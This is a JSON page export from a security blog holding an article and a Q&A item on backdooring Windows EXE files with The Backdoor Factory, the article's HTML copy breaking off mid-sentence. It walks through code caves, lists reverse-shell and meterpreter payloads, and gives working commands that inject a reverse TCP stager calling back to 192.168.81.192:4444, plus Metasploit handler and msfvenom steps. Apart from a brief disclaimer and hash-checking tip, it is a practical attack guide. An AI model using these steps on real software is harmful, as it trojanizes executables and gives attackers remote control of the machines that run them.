[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f08qJb4Iepe-NW_5jRfrgBEhRVm0Y1dg_B1ojiZm6RoU":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":51,"createdAt":51,"_status":50},379,"Why does BDF offer payloads like 'iat_reverse_tcp_inline' and what is the purpose of 'cave_miner_inline'?","The `iat_reverse_tcp_inline` payload includes IAT repair logic to load necessary APIs (e.g., `LoadLibraryA`, `GetProcAddress`) if the target EXE's import table lacks them, ensuring the backdoor works. The `cave_miner_inline` is a minimal template (135 bytes) that only implements control flow jumps, serving as a basis for custom shellcode development. These payloads cover different scenarios when using the [Backdoor Factory](\u002Fnews\u002Fimplanting-backdoors-into-exe-files-using-bdf).","\u003Cp>The `iat_reverse_tcp_inline` payload includes IAT repair logic to load necessary APIs (e.g., `LoadLibraryA`, `GetProcAddress`) if the target EXE&#39;s import table lacks them, ensuring the backdoor works. The `cave_miner_inline` is a minimal template (135 bytes) that only implements control flow jumps, serving as a basis for custom shellcode development. These payloads cover different scenarios when using the [Backdoor Factory](\u002Fnews\u002Fimplanting-backdoors-into-exe-files-using-bdf).\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fimplanting-backdoors-into-exe-files-using-bdf\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","why-does-bdf-offer-payloads-like-iat_reverse_tcp_inline-and-what-is-the-purpose--1777483703157","IAT, reverse shell, cave_miner, payload, Backdoor Factory, shellcode",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":47,"updatedAt":48,"createdAt":49,"_status":50},95,"Implanting backdoors into EXE files using BDF","implanting-backdoors-into-exe-files-using-bdf","Learn how to implant backdoors into EXE files using The Backdoor Factory. Explore principles, code caves, payload injection, and practical testing for ethical hacking.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>The Backdoor Factory can be used to implant backdoors into executable files, modify program execution flow, and execute added payloads.\u003C\u002Fp>\u003Cp>This article will introduce the principles of implanting backdoors into EXE files, test the methods of The Backdoor Factory for backdoor implantation, analyze the details, and summarize the approach.\u003C\u002Fp>\u003Cp>The Backdoor Factory download address:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fsecretsquirrel\u002Fthe-backdoor-factory\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>Principles of EXE file backdoor implantation\u003C\u002Fli>\u003Cli>Practical testing of The Backdoor Factory\u003C\u002Fli>\u003Cli>Analysis of The Backdoor Factory functionality\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Basic Knowledge\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>\u003Cstrong>PE File Format:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>References:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fen.wikibooks.org\u002Fwiki\u002FX86_Disassembly\u002FWindows_Executable_Files\u003C\u002Fp>\u003Cp>\u003Cstrong>Code Caves:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>References:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.codeproject.com\u002FArticles\u002F20240\u002FThe-Beginners-Guide-to-Codecaves\u003C\u002Fp>\u003Cp>\u003Cstrong>Intuitive Understanding of Code Caves:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Generate an exe file using vc6.0 and examine the available Code Caves in the file\u003C\u002Fp>\u003Cp>C code:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>#include \"stdafx.h\"\u003Cbr>#include \u003Cwindows.h>\u003Cbr>#include \u003Cstdio.h>\u003Cbr>\u003Cbr>int array[200]={1,2,3,4,5,6,7,8,9};\u003Cbr>char array2[200]=\"123456789ABCDEF\";\u003Cbr>\u003Cbr>int main(int argc, char* argv[])\u003Cbr>{\u003Cbr>\tprintf(\"hello world\");\t\u003Cbr>\treturn 0;\u003Cbr>}\u003C\u002Fstdio.h>\u003C\u002Fwindows.h>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Open the file generated by Release compilation using Immunity Debugger\u003C\u002Fp>\u003Cp>View-Memory (shortcut Alt+M)\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017415890_0_a074bf8e65.jpeg\">\u003C\u002Fp>\u003Cp>hello.exe contains four sections, namely PE header, .text, .rdata, and .data\u003C\u002Fp>\u003Cp>View the .data section of hello.exe\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017461665_1_5579f0a51a.jpeg\">\u003C\u002Fp>\u003Cp>Large sections of 0x00 data are found, which can be replaced with payload\u003C\u002Fp>\u003Ch2>0x03 Principle of File Backdoor Implantation\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>Implantation Principle\u003C\u002Fh3>\u003Cp>Modify the program's execution flow to jump to Code Caves, execute the payload, and then return to the normal program flow\u003C\u002Fp>\u003Cp>Note that by default, only the .text section of a program has execution permissions. If the payload is added to other sections (such as .data or .rdata), execution permissions must be granted to that section\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>In practice, multiple Code Caves can be jumped to piece together the execution of the payload\u003C\u002Fp>\u003Ch3>Exploitation Approach\u003C\u002Fh3>\u003Ch4>1. Add a new section with read, write, and execute (RWE) permissions\u003C\u002Fh4>\u003Cp>Tools such as LordPE can be used\u003C\u002Fp>\u003Cp>Manual addition reference:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.exploit-db.com\u002Fdocs\u002F42061.pdf\u003C\u002Fp>\u003Cp>\u003Cstrong>Advantages:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Simple and straightforward, no need to consider the size of file Code Caves\u003C\u002Fp>\u003Cp>\u003Cstrong>Disadvantages:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Increases file size\u003C\u002Fp>\u003Ch4>2. Use Code Caves\u003C\u002Fh4>\u003Cp>Search existing sections to find available Code Caves; for non-executable sections, executable permissions must also be added.\u003C\u002Fp>\u003Cp>\u003Cstrong>Advantages:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Does not change file size.\u003C\u002Fp>\u003Cp>\u003Cstrong>Disadvantages:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Need to consider whether the size of the Code Caves meets the payload length.\u003C\u002Fp>\u003Ch2>0x04 Practical Testing: The Backdoor Factory\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Kali 2.0 comes with The Backdoor Factory by default, located at usr\u002Fshare\u002Fbackdoor-factory.\u003C\u002Fp>\u003Cp>The test system is selected as Kali 2.0.\u003C\u002Fp>\u003Cp>For ease of testing, the test exe code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>#include \u003Cwindows.h>\u003Cbr>#include \u003Cstdio.h>\u003Cbr>\u003Cbr>int array[200]={1,2,3,4,5,6,7,8,9};\u003Cbr>char array2[200]=\"123456789ABCDEF\";\u003Cbr>\u003Cbr>int main(int argc, char* argv[])\u003Cbr>{\u003Cbr>\tprintf(\"hello world\\n\");\t\u003Cbr>\tsystem(\"PAUSE\"); \u003Cbr>\treturn 0;\u003Cbr>}\u003C\u002Fstdio.h>\u003C\u002Fwindows.h>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The program outputs hello world and then pauses\u003C\u002Fp>\u003Cp>The following introduces common functions in The Backdoor Factory\u003C\u002Fp>\u003Ch3>1. Check if the file is compatible with The Backdoor Factory\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fbackdoor.py -f test.exe -S\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Output as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>[*] Checking if binary is supported\u003Cbr>[*] Gathering file info\u003Cbr>[*] Reading win32 entry instructions\u003Cbr>test.exe is supported.\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. Get available payloads for this file\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fbackdoor.py -f test.exe -s show\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The output is as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017478077_2_1b3d54bbf8.jpeg\">\u003C\u002Fp>\u003Cp>Available payloads are as follows:\u003C\u002Fp>\u003Cul>\u003Cli>cave_miner_inline\u003C\u002Fli>\u003Cli>iat_reverse_tcp_inline\u003C\u002Fli>\u003Cli>iat_reverse_tcp_inline_threaded\u003C\u002Fli>\u003Cli>iat_reverse_tcp_stager_threaded\u003C\u002Fli>\u003Cli>iat_user_supplied_shellcode_threaded\u003C\u002Fli>\u003Cli>meterpreter_reverse_https_threaded\u003C\u002Fli>\u003Cli>reverse_shell_tcp_inline\u003C\u002Fli>\u003Cli>reverse_tcp_stager_threaded\u003C\u002Fli>\u003Cli>user_supplied_shellcode_threaded\u003C\u002Fli>\u003C\u002Ful>\u003Cp>\u003Cstrong>Name resolution:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>\u003Cstrong>cave_miner_inline:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>As a payload template with a length of 135, it only implements control flow jumps and performs no other operations, serving as a template for custom shellcode development.\u003C\u002Fp>\u003Cp>The disassembled payload format is shown in the figure below.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017487710_3_d721473ed4.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>reverse_shell_tcp_inline:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Corresponding meterpreter server:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>use exploit\u002Fmulti\u002Fhandler\u003Cbr>set payload windows\u002Fmeterpreter\u002Freverse_tcp\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>meterpreter_reverse_https_threaded:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Corresponding meterpreter server:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>use exploit\u002Fmulti\u002Fhandler\u003Cbr>set payload windows\u002Fmeterpreter\u002Freverse_https\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>iat in iat_reverse_tcp_inline:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>iat stands for Import Address Table. If the PE file's IAT does not include the APIs LoadLibraryA and GetProcAddress, directly executing the payload reverse_shell_tcp_inline will fail. iat_reverse_tcp_inline adds functionality to repair the IAT to avoid execution failure.\u003C\u002Fp>\u003Cp>\u003Cstrong>user_supplied_shellcode_threaded:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Custom payload, which can be generated via msf.\u003C\u002Fp>\u003Ch3>3. Search for available Code Caves in the file\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fbackdoor.py -f test.exe -c\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>If the payload length is 703, the Code Caves must satisfy a length greater than 703. Parameters are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fbackdoor.py -f test.exe -c -l 703\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Output as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017497493_4_9b62c67208.jpeg\">\u003C\u002Fp>\u003Cp>Found three exploitable locations in total:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>No section\u003Cbr>-&gt;Begin Cave 0x240\u003Cbr>-&gt;End of Cave 0x1000\u003Cbr>Size of Cave (int) 3520\u003Cbr>**************************************************\u003Cbr>No section\u003Cbr>-&gt;Begin Cave 0x693a\u003Cbr>-&gt;End of Cave 0x700c\u003Cbr>Size of Cave (int) 1746\u003Cbr>**************************************************\u003Cbr>We have a winner: .data\u003Cbr>-&gt;Begin Cave 0x7051\u003Cbr>-&gt;End of Cave 0x7350\u003Cbr>Size of Cave (int) 767\u003Cbr>SizeOfRawData 0x1000\u003Cbr>PointerToRawData 0x7000\u003Cbr>End of Raw Data: 0x8000\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The output address is a Relative Virtual Address (RVA), which is the offset address relative to the file header (base address Image Base)\u003C\u002Fp>\u003Cp>The actual address in memory (Virtual Address) = Image Base + RVA\u003C\u002Fp>\u003Cp>ImageBase = 0x00400000\u003C\u002Fp>\u003Cp>Use Immunity Debugger to view the memory structure for verification\u003C\u002Fp>\u003Cp>Memory structure as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017505897_5_cb528d3f77.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>(1)\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>No section\u003C\u002Fp>\u003Cp>-&gt;Begin Cave 0x240\u003C\u002Fp>\u003Cp>-&gt;End of Cave 0x1000\u003C\u002Fp>\u003Cp>Size of Cave (int) 3520\u003C\u002Fp>\u003Cp>Actual memory address is 0x00400240-0x00401000, located in the PE header, default permission is R\u003C\u002Fp>\u003Cp>View memory address data as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017511367_6_a5650cbb10.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>(2)\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>No section\u003C\u002Fp>\u003Cp>-&gt;Begin Cave 0x693a\u003C\u002Fp>\u003Cp>-&gt;End of Cave 0x700c\u003C\u002Fp>\u003Cp>Size of Cave (int) 1746\u003C\u002Fp>\u003Cp>Actual memory address is 0x0040693a-0x0040700c, located in the .rdata section, default permission is R\u003C\u002Fp>\u003Cp>View memory address data as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017516858_7_afee61644d.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>(3)\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>We have a winner: .data\u003C\u002Fp>\u003Cp>-&gt;Begin Cave 0x7051\u003C\u002Fp>\u003Cp>-&gt;End of Cave 0x7350\u003C\u002Fp>\u003Cp>Size of Cave (int) 767\u003C\u002Fp>\u003Cp>Actual memory address is 0x00407051-0x00407350, located in the .data section with default RW permissions\u003C\u002Fp>\u003Cp>View memory address data as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017521356_8_7157a1aa5d.jpeg\">\u003C\u002Fp>\u003Cp>It can be seen that the Code Caves found through The Backdoor Factory all meet the requirements\u003C\u002Fp>\u003Ch3>4. Add payload\u003C\u002Fh3>\u003Cp>Here, reverse_tcp_stager_threaded is selected for testing, with a payload length of 703\u003C\u002Fp>\u003Cp>Server:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>use exploit\u002Fmulti\u002Fhandler\u003Cbr>set payload windows\u002Fmeterpreter\u002Freverse_tcp\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(1) Add a new section to save the payload\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fbackdoor.py -f test.exe -H 192.168.81.192 -P 4444 -s reverse_tcp_stager_threaded -a -o test1.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The new section is named .sdata with RWE permissions\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017524645_9_9ef2f8743b.jpeg\">\u003C\u002Fp>\u003Cp>If specifying the new section name as aaa, the parameters are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fbackdoor.py -f test.exe -H 192.168.81.192 -P 4444 -s reverse_tcp_stager_threaded -a -n aaa -o test1.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(2) Save the payload into the .data section\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fbackdoor.py -f test.exe -H 192.168.81.192 -P 4444 -s reverse_tcp_stager_threaded -o test2.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Select the .data section as prompted\u003C\u002Fp>\u003Cp>Change the .data section permissions to RWE, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017526812_10_c6ff04d607.jpeg\">\u003C\u002Fp>\u003Cp>Add jump code JMP TEST2.00407055 at the program entry point, where 0x00407055 stores the added payload\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017528213_11_46aa0eab2d.jpeg\">\u003C\u002Fp>\u003Ch4>(3) Save payload to other segments\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fbackdoor.py -f test.exe -H 192.168.81.192 -P 4444 -s reverse_tcp_stager_threaded -o test3.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Select the PE header as prompted, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017530136_12_f89f65a0d1.jpeg\">\u003C\u002Fp>\u003Cp>Execution will report an error and needs to be fixed\u003C\u002Fp>\u003Cp>Use the tool nasm_shell to convert assembly code into hexadecimal data\u003C\u002Fp>\u003Cp>Kali2.0 integrates nasm_shell by default\u003C\u002Fp>\u003Cp>Tool usage is shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017531304_13_1444d8a8ba.jpeg\">\u003C\u002Fp>\u003Ch4>(4) Custom payload\u003C\u002Fh4>\u003Cp>Generate payload:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>msfvenom -p windows\u002Fmessagebox -f raw &gt;msg.bin\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Add payload:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fbackdoor.py -f test.exe -s user_supplied_shellcode_threaded -U msg.bin -o test4.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Testing as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017532156_14_834d64cab9.jpeg\">\u003C\u002Fp>\u003Ch2>0x05 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces the method of implanting backdoors into EXE files using The Backdoor Factory, leveraging Code Caves to avoid altering the original file size.\u003C\u002Fp>\u003Cp>Of course, this exploitation method has already been detected by antivirus software. The content presented here is for technical research purposes only.\u003C\u002Fp>\u003Cp>From a defensive perspective, extra caution is required when downloading files: only download programs from trusted sources and verify file hashes.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>The Backdoor Factory can be used to implant backdoors into executable files, modify program execution flow, and execute added payloads.\u003C\u002Fp>\u003Cp>This article will introduce the principles of implanting backdoors into EXE files, test the methods of The Backdoor Factory for backdoor implantation, analyze the details, and summarize the approach.\u003C\u002Fp>\u003Cp>The Backdoor Factory download address:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fsecretsquirrel\u002Fthe-backdoor-factory\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>Principles of EXE file backdoor implantation\u003C\u002Fli>\u003Cli>Practical testing of The Backdoor Factory\u003C\u002Fli>\u003Cli>Analysis of The Backdoor Factory functionality\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Basic Knowledge\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>\u003Cstrong>PE File Format:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>References:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fen.wikibooks.org\u002Fwiki\u002FX86_Disassembly\u002FWindows_Executable_Files\u003C\u002Fp>\u003Cp>\u003Cstrong>Code Caves:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>References:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.codeproject.com\u002FArticles\u002F20240\u002FThe-Beginners-Guide-to-Codecaves\u003C\u002Fp>\u003Cp>\u003Cstrong>Intuitive Understanding of Code Caves:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Generate an exe file using vc6.0 and examine the available Code Caves in the file\u003C\u002Fp>\u003Cp>C code:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>#include \"stdafx.h\"\u003Cbr>#include \u003Cwindows.h>\u003Cbr>#include \u003Cstdio.h>\u003Cbr>\u003Cbr>int array[200]={1,2,3,4,5,6,7,8,9};\u003Cbr>char array2[200]=\"123456789ABCDEF\";\u003Cbr>\u003Cbr>int main(int argc, char* argv[])\u003Cbr>{\u003Cbr>\tprintf(\"hello world\");\t\u003Cbr>\treturn 0;\u003Cbr>}\u003C\u002Fstdio.h>\u003C\u002Fwindows.h>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Open the file generated by Release compilation using Immunity Debugger\u003C\u002Fp>\u003Cp>View-Memory (shortcut Alt+M)\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017415890_0_a074bf8e65-1.jpeg\">\u003C\u002Fp>\u003Cp>hello.exe contains four sections, namely PE header, .text, .rdata, and .data\u003C\u002Fp>\u003Cp>View the .data section of hello.exe\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017461665_1_5579f0a51a-1.jpeg\">\u003C\u002Fp>\u003Cp>Large sections of 0x00 data are found, which can be replaced with payload\u003C\u002Fp>\u003Ch2>0x03 Principle of File Backdoor Implantation\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>Implantation Principle\u003C\u002Fh3>\u003Cp>Modify the program's execution flow to jump to Code Caves, execute the payload, and then return to the normal program flow\u003C\u002Fp>\u003Cp>Note that by default, only the .text section of a program has execution permissions. If the payload is added to other sections (such as .data or .rdata), execution permissions must be granted to that section\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>In practice, multiple Code Caves can be jumped to piece together the execution of the payload\u003C\u002Fp>\u003Ch3>Exploitation Approach\u003C\u002Fh3>\u003Ch4>1. Add a new section with read, write, and execute (RWE) permissions\u003C\u002Fh4>\u003Cp>Tools such as LordPE can be used\u003C\u002Fp>\u003Cp>Manual addition reference:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.exploit-db.com\u002Fdocs\u002F42061.pdf\u003C\u002Fp>\u003Cp>\u003Cstrong>Advantages:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Simple and straightforward, no need to consider the size of file Code Caves\u003C\u002Fp>\u003Cp>\u003Cstrong>Disadvantages:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Increases file size\u003C\u002Fp>\u003Ch4>2. Use Code Caves\u003C\u002Fh4>\u003Cp>Search existing sections to find available Code Caves; for non-executable sections, executable permissions must also be added.\u003C\u002Fp>\u003Cp>\u003Cstrong>Advantages:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Does not change file size.\u003C\u002Fp>\u003Cp>\u003Cstrong>Disadvantages:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Need to consider whether the size of the Code Caves meets the payload length.\u003C\u002Fp>\u003Ch2>0x04 Practical Testing: The Backdoor Factory\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Kali 2.0 comes with The Backdoor Factory by default, located at usr\u002Fshare\u002Fbackdoor-factory.\u003C\u002Fp>\u003Cp>The test system is selected as Kali 2.0.\u003C\u002Fp>\u003Cp>For ease of testing, the test exe code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>#include \u003Cwindows.h>\u003Cbr>#include \u003Cstdio.h>\u003Cbr>\u003Cbr>int array[200]={1,2,3,4,5,6,7,8,9};\u003Cbr>char array2[200]=\"123456789ABCDEF\";\u003Cbr>\u003Cbr>int main(int argc, char* argv[])\u003Cbr>{\u003Cbr>\tprintf(\"hello world\\n\");\t\u003Cbr>\tsystem(\"PAUSE\"); \u003Cbr>\treturn 0;\u003Cbr>}\u003C\u002Fstdio.h>\u003C\u002Fwindows.h>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The program outputs hello world and then pauses\u003C\u002Fp>\u003Cp>The following introduces common functions in The Backdoor Factory\u003C\u002Fp>\u003Ch3>1. Check if the file is compatible with The Backdoor Factory\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fbackdoor.py -f test.exe -S\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Output as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>[*] Checking if binary is supported\u003Cbr>[*] Gathering file info\u003Cbr>[*] Reading win32 entry instructions\u003Cbr>test.exe is supported.\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. Get available payloads for this file\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fbackdoor.py -f test.exe -s show\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The output is as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017478077_2_1b3d54bbf8-1.jpeg\">\u003C\u002Fp>\u003Cp>Available payloads are as 